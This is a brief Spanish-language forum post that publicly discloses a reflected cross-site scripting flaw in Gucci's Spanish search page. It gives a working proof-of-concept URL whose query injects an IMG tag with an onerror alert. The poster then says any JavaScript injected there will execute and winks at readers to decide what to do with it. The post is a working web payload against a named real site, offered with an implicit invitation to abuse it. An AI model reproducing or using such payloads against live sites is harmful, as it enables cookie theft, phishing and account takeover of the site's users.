XSS] Gucci

Hola, aquí les dejo un XSS (Cros-Site Scripting) que encontré en Gucci pues simplemente les dejo el PoC
Vector -> http://www.gucci.com/es/search?query=%3CIMG+SRC%3D%2F+onerror%3D%22alert(String.fromCharCode(83,%20113,%20117,%20105,%20100,%2032,%2045,%2032,%2066,%20108,%2097,%2099,%20107,%2076,%2097,%20115,%20116,%2032,%2083,%20101,%2099))%22%3E%3C%2Fimg%3E

En el query inyectais cualquier código javascript y se ejecutará en bruto piensen que hacen con el ;)
Un saludo